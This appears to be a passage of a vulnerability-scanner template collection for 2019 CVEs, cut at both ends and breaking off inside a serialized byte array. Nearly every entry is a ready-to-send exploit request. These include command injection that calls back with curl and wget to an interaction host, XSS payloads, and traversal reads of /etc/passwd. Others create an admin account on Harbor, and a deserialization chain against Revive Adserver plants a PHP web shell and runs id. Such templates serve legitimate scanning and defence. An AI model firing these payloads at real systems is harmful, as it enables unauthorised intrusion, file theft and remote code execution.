application/x-www-form-urlencoded\n\ndate=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","name":"http","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16097","info":{"name":"Harbor <=1.82.0 - Privilege Escalation","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/users"],"body":"{\"username\": \"testpoc\", \"has_admin_role\": true, \"password\": \"TestPoc!\", \"email\": \"testpoc@interact.sh\", \"realname\": \"poc\"}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"response","words":["username has already been used","Location: /api/users/"],"condition":"or"},{"type":"status","status":[201,409],"condition":"or"}]}]},{"id":"CVE-2019-13392","info":{"name":"MindPalette NateMail 3.0.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /NateMail.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nrecipient=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2019-8390","info":{"name":"qdPM 9.1 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin%5B_csrf_token%5D={{csrf}}&login%5Bemail%5D={{username}}&login%5Bpassword%5D={{password}}&http_referer=\n","POST /index.php/users HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearch[keywords]=e\"><script>alert(document.domain)</script>&search_by_extrafields[]=9\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","alert alert-info alert-search-result"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"login\\[_csrf_token\\]\" value=\"(.*?)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-19908","info":{"name":"phpMyChat-Plus 1.98 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["username = \"</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19368","info":{"name":"Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Login?!'><sVg/OnLoAD=alert`1337`//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=''><sVg/OnLoAD=alert`1337`//'>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-6715","info":{"name":"W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated File Read / Directory Traversal","severity":"high"},"requests":[{"raw":["PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"Type\":\"SubscriptionConfirmation\",\"Message\":\"\",\"SubscribeURL\":\"https://rfi.nessus.org/rfi.txt\"}\n"],"matchers":[{"type":"word","part":"body","words":["TmVzc3VzQ29kZUV4ZWNUZXN0"]}]}]},{"id":"CVE-2019-18371","info":{"name":"Xiaomi Mi WiFi R3G Routers - Local file Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api-third-party/download/extdisks../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20210","info":{"name":"WordPress CTHthemes - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?search_term=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","/wp-content/themes/citybook"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15501","info":{"name":"L-Soft LISTSERV <16.5-2018a - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","LISTSERV"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14530","info":{"name":"OpenEMR <5.0.2 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_login_session_management=1&authProvider=Default&authUser={{username}}&clearPass={{password}}&languageChoice=1\n","GET /custom/ajax_download.php?fileName=../../../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["filename=passwd"]},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14251","info":{"name":"T24 Web Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd","{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7315","info":{"name":"Genie Access WIP3BVAF IP Camera - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10717","info":{"name":"BlogEngine.NET 3.3.7.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/filemanager?path=%2F..%2f..%2fContent"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","regex":["~/App_Data/files/../../([a-zA-Z0-9\\.\\-]+)/([a-z0-9]+)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1898","info":{"name":"Cisco RV110W RV130W RV215W Router - Information leakage","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/_syslog.txt"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(to_lower(body), \"ethernet\") && contains(to_lower(body), \"connection\")","contains(header, \"application/octet-stream\")"],"condition":"and"}]}]},{"id":"CVE-2019-19781","info":{"name":"Citrix ADC and Gateway - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/vpn/../vpns/cfg/smb.conf"],"matchers-condition":"and","matchers":[{"type":"word","words":["[global]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9726","info":{"name":"Homematic CCU3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.%00./.%00./etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","bin:.*:0:0:"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1010290","info":{"name":"Babel - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/babel/redirect.php?newurl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2019-12986","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /Collector/diagnostics/trace_route HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipAddress=%60/bin/wget+http://{{interactsh-url}}%60\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-8903","info":{"name":"Totaljs <3.2.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apache2.conf"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11370","info":{"name":"Carel pCOWeb <B1.2.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /config/pw_snmp_done.html HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n%3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n","GET /config/pw_snmp.html HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, \"text/html\")","status_code_2 == 200","contains(body_2, 'value=\\\"\\\"><script>alert(document.domain)</script>\\\"></td>')"],"condition":"and"}]}]},{"id":"CVE-2019-15043","info":{"name":"Grafana - Improper Access Control","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/snapshots"],"body":"{\"dashboard\": {\"name\":\"{{payload}}\"}}","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"deleteUrl\":","\"deleteKey\":","\"key\":","\"url\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10098","info":{"name":"Apache HTTP server v2.4.0 to v2.4.39 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/http%3A%2F%2Fwww.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2019-16920","info":{"name":"D-Link Routers - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}\n\nhtml_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384\n","POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}/login_pic.asp\nCookie: uid=1234123\n\nhtml_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}}\n","POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}/login_pic.asp\nCookie: uid=1234123\n\nhtml_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\\\Windows\\\\win.ini')}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17574","info":{"name":"Popup-Maker < 1.8.12 - Broken Authentication","severity":"critical"},"requests":[{"raw":["GET /?pum_action=tools_page_tab_system_info HTTP/1.1\nHost: {{Hostname}}\n","POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npopmake_action=popup_sysinfo&popmake-sysinfo=CVE-2019-17574\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["Popup Maker Configuration","Webserver Configuration"],"condition":"and"},{"type":"word","part":"body_2","words":["CVE-2019-17574"]}]}]},{"id":"CVE-2019-5434","info":{"name":"Revive Adserver 4.2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /adxmlrpc.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip\n\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?> <methodCall> <methodName>openads.spc</methodName> <params> <param> <value> <struct> <member> <name>remote_addr</name> <value>8.8.8.8</value> </member> <member> <name>cookies</name> <value> <array> </array> </value> </member> </struct> </value> </param> <param><value><string>a:1:{S:4:\"what\";O:11:\"Pdp\\Uri\\Url\":1:{S:17:\"\\00Pdp\\5CUri\\5CUrl\\00host\";O:21:\"League\\Flysystem\\File\":2:{S:7:\"\\00*\\00path\";S:55:\"plugins/3rdPartyServers/ox3rdPartyServers/max.class.php\";S:13:\"\\00*\\00filesystem\";O:21:\"League\\Flysystem\\File\":2:{S:7:\"\\00*\\00path\";S:66:\"x://data:text/html;base64,PD9waHAgc3lzdGVtKCRfR0VUWyIwIl0pOyA/Pg==\";S:13:\"\\00*\\00filesystem\";O:29:\"League\\Flysystem\\MountManager\":2:{S:14:\"\\00*\\00filesystems\";a:1:{S:1:\"x\";O:27:\"League\\Flysystem\\Filesystem\":2:{S:10:\"\\00*\\00adapter\";O:30:\"League\\Flysystem\\Adapter\\Local\":1:{S:13:\"\\00*\\00pathPrefix\";S:0:\"\";}S:9:\"\\00*\\00config\";O:23:\"League\\Flysystem\\Config\":1:{S:11:\"\\00*\\00settings\";a:1:{S:15:\"disable_asserts\";b:1;}}}}S:10:\"\\00*\\00plugins\";a:1:{S:10:\"__toString\";O:34:\"League\\Flysystem\\Plugin\\ForcedCopy\":0:{}}}}}}}</string></value></param> <param><value><string>0</string></value></param> <param><value><string>dsad</string></value></param> <param><value><boolean>1</boolean></value></param> <param><value><boolean>0</boolean></value></param> <param><value><boolean>1</boolean></value></param> </params> </methodCall>\n","GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php?0=id HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["text/html"]},{"type":"regex","part":"body_2","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7219","info":{"name":"Zarafa WebApp <=2.0.1.47791 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webapp/?fccc%27\\%22%3E%3Csvg/onload=alert(/xss/)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(/xss/)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14789","info":{"name":"Custom 404 Pro < 3.2.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=c4p-main&s=%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<svg/onload=alert(document.domain)>\")","contains(body_2, \"Custom 404 Pro\")"],"condition":"and"}]}]},{"id":"CVE-2019-8449","info":{"name":"Jira <8.4.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"users\":{\"users\":"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14470","info":{"name":"WordPress UserPro 4.9.32 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18957","info":{"name":"MicroStrategy Library <11.1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/MicroStrategyLibrary/auth/ui/loginPage?loginMode=alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["previousLoginMode: alert(document.domain),"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18393","info":{"name":"Ignite Realtime Openfire <4.42 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/search/..\\..\\..\\conf\\openfire.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["org.jivesoftware.database.EmbeddedConnectionProvider","Most properties are stored in the Openfire database"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9978","info":{"name":"WordPress Social Warfare <3.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3401","info":{"name":"Atlassian Jira <7.13.3/8.0.0-8.1.1 - Incorrect Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ManageFilters.jspa?filter=popular&filterView=popular"],"matchers":[{"type":"word","words":["<span data-filter-field=\"owner-full-name\">","<title>Manage Filters - Jira</title>"],"condition":"and"}]}]},{"id":"CVE-2019-17506","info":{"name":"D-Link DIR-868L/817LW - Information Disclosure","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/getcfg.php"],"body":"SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a\n","headers":{"Content-Type":"text/xml"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</password>","DEVICE.ACCOUNT"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8446","info":{"name":"Jira Improper Authorization","severity":"medium"},"requests":[{"raw":["POST /rest/issueNav/1/issueTable HTTP/1.1\nHost: {{Hostname}}\nConnection: Close\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\nX-Atlassian-Token: no-check\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\n\n{'jql':'project in projectsLeadByUser(\"{{randstr}}\")'}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["the user does not exist"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20085","info":{"name":"TVT NVMS 1000 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\\[(font|extension|file)s\\]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2725","info":{"name":"Oracle WebLogic Server - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\nContent-Type: text/xml\ncmd: id\n\n<?xml version=\"1.0\" encoding=\"utf-8\" ?><soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action/><wsa:RelatesTo/><asy:onAsyncDelivery/><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><class><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void><array class=\"byte\" length=\"5010\"><void index=\"0\"><byte>-84</byte></void><void index=\"1\"><byte>-19</byte></void><void index=\"2\"><byte>0</byte></void><void index=\"3\"><byte>5</byte></void><void index=\"4\"><byte>115</byte></void><void index=\"5\"><byte>114</byte></void><void index=\"6\"><byte>0</byte></void><void index=\"7\"><byte>23</byte></void><void index=\"8\"><byte>106</byte></void><void index=\"9\"><byte>97</byte></void><void index=\"10\"><byte>118</byte></void><void index=\"11\"><byte>97</byte></void><void index=\"12\"><byte>46</byte></void><void index=\"13\"><byte>117</byte></void><void index=\"14\"><byte>116</byte></void><void index=\"15\"><byte>105</byte></void><void index=\"16\"><byte>108</byte></void><void index=\"17\"><byte>46</byte></void><void index=\"18\"><byte>76</byte></void><void index=\"19\"><byte>105</byte></void><void index=\"20\"><byte>110</byte></void><void index=\"21\"><byte>107</byte></void><void index=\"22\"><byte>101</byte></void><void index=\"23\"><byte>100</byte></void><void index=\"24\"><byte>72</byte></void><void index=\"25\"><byte>97</byte></void><void index=\"26\"><byte>115</byte></void><void index=\"27\"><byte>104</byte></void><void index=\"28\"><byte>83</byte></void><void index=\"29\"><byte>101</byte></void><void index=\"30\"><byte>116</byte></void><void index=\"31\"><byte>-40</byte></void><void index=\"32\"><byte>108</byte></void><void index=\"33\"><byte>-41</byte></void><void index=\"34\"><byte>90</byte></void><void index=\"35\"><byte>-107</byte></void><void index=\"36\"><byte>-35</byte></void><void index=\"37\"><byte>42</byte></void><void index=\"38\"><byte>30</byte></void><void index=\"39\"><byte>2</byte></void><void index=\"40\"><byte>0</byte></void><void index=\"41\"><byte>0</byte></void><void index=\"42\"><byte>120</byte></void><void index=\"43\"><byte>114</byte></void><void index=\"44\"><byte>0</byte></void><void index=\"45\"><byte>17</byte></void><void index=\"46\"><byte>106</byte></void><void index=\"47\"><byte>97</byte></void><void index=\"48\"><byte>118</byte></void><void index=\"49\"><byte>97</byte></void><void index=\"50\"><byte>46</byte></void><void index=\"51\"><byte>117</byte></void><void index=\"52\"><byte>116</byte></void><void index=\"53\"><byte>105</byte></void><void index=\"54\"><byte>108</byte></void><void index=\"55\"><byte>46</byte></void><void index=\"56\"><byte>72</byte></void><void index=\"57\"><byte>97</byte></void><void index=\"58\"><byte>115</byte></void><void index=\"59\"><byte>104</byte></void><void index=\"60\"><byte>83</byte></void><void index=\"61\"><byte>101</byte></void><void index=\"62\"><byte>116</byte></void><void index=\"63\"><byte>-70</byte></void><void index=\"64\"><byte>68</byte></void><void index=\"65\"><byte>-123</byte></void><void index=\"66\"><byte>-107</byte></void><void index=\"67\"><byte>-106</byte></void><void index=\"68\"><byte>-72</byte></void><void index=\"69\"><byte>-73</byte></void><void index=\"70\"><byte>52</byte></void><void index=\"71\"><byte>3</byte></void><void index=\"72\"><byte>0</byte></void><void index=\"73\"><byte>0</byte></void><void index=\"74\"><byte>120</byte></void><void index=\"75\"><byte>112</byte></void><void index=\"76\"><byte>119</byte></void><void index=\"77\"><byte>12</byte></void><void index=\"78\"><byte>0</byte></void><void index=\"79\"><byte>0</byte></void><void index=\"80\"><byte>0</byte></void><void index=\"81\"><byte>16</byte></void><void index=\"82\"><byte>63</byte></void><void index=\"83\"><byte>64</byte></void><void index=\"84\"><byte>0</byte></void><void index=\"85\"><byte>0</byte></void><void index=\"86\"><byte>0</byte></void><void index=\"87\"><byte>0</byte></void><void index=\"88\"><byte>0</byte></void><void index=\"89\"><byte>2</byte></void><void index=\"90\"><byte>115</byte></void><void index=\"91\"><byte>114</byte></void><void index=\"92\"><byte>0</byte></void><void index=\"93\"><byte>58</byte></void><void index=\"94\"><byte>99</byte></void><void index=\"95\"><byte>111</byte></void><void index=\"96\"><byte>109</byte></void><void index=\"97\"><byte>46</byte></void><void index=\"98\"><byte>115</byte></void><void index=\"99\"><byte>117</byte></void><void index=\"100\"><byte>110</byte></void><void index=\"101\"><byte>46</byte></void><void index=\"102\"><byte>111</byte></void><void index=\"103\"><byte>114</byte></void><void index=\"104\"><byte>103</byte></void><void index=\"105\"><byte>46</byte></void><void index=\"106\"><byte>97</byte></void><void index=\"107\"><byte>112</byte></void><void index=\"108\"><byte>97</byte></void><void index=\"109\"><byte>99</byte></void><void index=\"110\"><byte>104</byte></void><void index=\"111\"><byte>101</byte></void><void index=\"112\"><byte>46</byte></void><void index=\"113\"><byte>120</byte></void><void index=\"114\"><byte>97</byte></void><void index=\"115\"><byte>108</byte></void><void index=\"116\"><byte>97</byte></void><void index=\"117\"><byte>110</byte></void><void index=\"118\"><byte>46</byte></void><void index=\"119\"><byte>105</byte></void><void index=\"120\"><byte>110</byte></void><void index=\"121\"><byte>116</byte></void><void index=\"122\"><byte>101</byte></void><void index=\"123\"><byte>114</byte></void><void index=\"124\"><byte>110</byte></void><void index=\"125\"><byte>97</byte></void><void index=\"126\"><byte>108</byte></void><void index=\"127\"><byte>46</byte></void><void index=\"128\"><byte>120</byte></void><void index=\"129\"><byte>115</byte></void><void index=\"130\"><byte>108</byte></void><void index=\"131\"><byte>116</byte></void><void index=\"132\"><byte>99</byte></void><void index=\"133\"><byte>46</byte></void><void index=\"134\"><byte>116</byte></void><void index=\"135\"><byte>114</byte></void><void index=\"136\"><byte>97</byte></void><void index=\"137\"><byte>120</byte></void><void index=\"138\"><byte>46</byte></void><void index=\"139\"><byte>84</byte></void><void index=\"140\"><byte>101</byte></void><void index=\"141\"><byte>109</byte></void><void index=\"142\"><byte>112</byte></void><void index=\"143\"><byte>108</byte></void><void index=\"144\"><byte>97</byte></void><void index=\"145\"><byte>116</byte></void><void index=\"146\"><byte>101</byte></void><void index=\"147\"><byte>115</byte></void><void index=\"148\"><byte>73</byte></void><void index=\"149\"><byte>109</byte></void><void index=\"150\"><byte>112</byte></void><void index=\"151\"><byte>108</byte></void><void index=\"152\"><byte>9</byte></void><void index=\"153\"><byte>87</byte></void><void index=\"154\"><byte>79</byte></void><void index=\"155\"><byte>-63</byte></void><void index=\"156\"><byte>110</byte></void><void index=\"157\"><byte>-84</byte></void><void index=\"158\"><byte>-85</byte></void><void index=\"159\"><byte>51</byte></void><void index=\"160\"><byte>3</byte></void><void index=\"161\"><byte>0</byte></void><void index=\"162\"><byte>9</byte></void><void index=\"163\"><byte>73</byte></void><void index=\"164\"><byte>0</byte></void><void index=\"165\"><byte>13</byte></void><void index=\"166\"><byte>95</byte></void><void index=\"167\"><byte>105</byte></void><void index=\"168\"><byte>110</byte></void><void index=\"169\"><byte>100</byte></void><void index=\"170\"><byte>101</byte></void><void index=\"171\"><byte>110</byte></void><void index=\"172\"><byte>116</byte></void><void index=\"173\"><byte>78</byte></void><void index=\"174\"><byte>117</byte></void><void index=\"175\"><byte>109</byte></void><void index=\"176\"><byte>98</byte></void><void index=\"177\"><byte>101</byte></void><void index=\"178\"><byte>114</byte></void><void index=\"179\"><byte>73</byte></void><void index=\"180\"><byte>0</byte></void><void index=\"181\"><byte>14</byte></void><void index=\"182\"><byte>95</byte></void><void index=\"183\"><byte>116</byte></void><void index=\"184\"><byte>114</byte></void><void index=\"185\"><byte>97</byte></void><void index=\"186\"><byte>110</byte></void><void index=\"187\"><byte>115</byte></void><void index=\"188\"><byte>108</byte></void><void index=\"189\"><byte>101</byte></void><void index=\"190\"><byte>116</byte></void><void index=\"191\"><byte>73</byte></void><void index=\"192\"><byte>110</byte></void><void index=\"193\"><byte>100</byte></void><void index=\"194\"><byte>101</byte></void><void index=\"195\"><byte>120</byte></void><void index=\"196\"><byte>90</byte></void><void index=\"197\"><byte>0</byte></void><void index=\"198\"><byte>21</byte></void><void index=\"199\"><byte>95</byte></void><void index=\"200\"><byte>117</byte></void><void index=\"201\"><byte>115</byte></void><void index=\"202\"><byte>101</byte></void><void index=\"203\"><byte>83</byte></void><void index=\"204\"><byte>101</byte></void><void index=\"205\"><byte>114</byte></void><void index=\"206\"><byte>118</byte></void><void index=\"207\"><byte>105</byte></void><void index=\"208\"><byte>99</byte></void><void index=\"209\"><byte>101</byte></void><void index=\"210\"><byte>115</byte></void><void index=\"211\"><byte>77</byte></void><void index=\"212\"><byte>101</byte></void><void index=\"213\"><byte>99</byte></void><void index=\"214\"><byte>104</byte></void><void index=\"215\"><byte>97</byte></void><void index=\"216\"><byte>110</byte></void><void index=\"217\"><byte>105</byte></void><void index=\"218\"><byte>115</byte></void><void index=\"219\"><byte>109</byte></void><void index=\"220\"><byte>76</byte></void><void index=\"221\"><byte>0</byte></void><void index=\"222\"><byte>25</byte></void><void index=\"223\"><byte>95</byte></void><void index=\"224\"><byte>97</byte></void><void 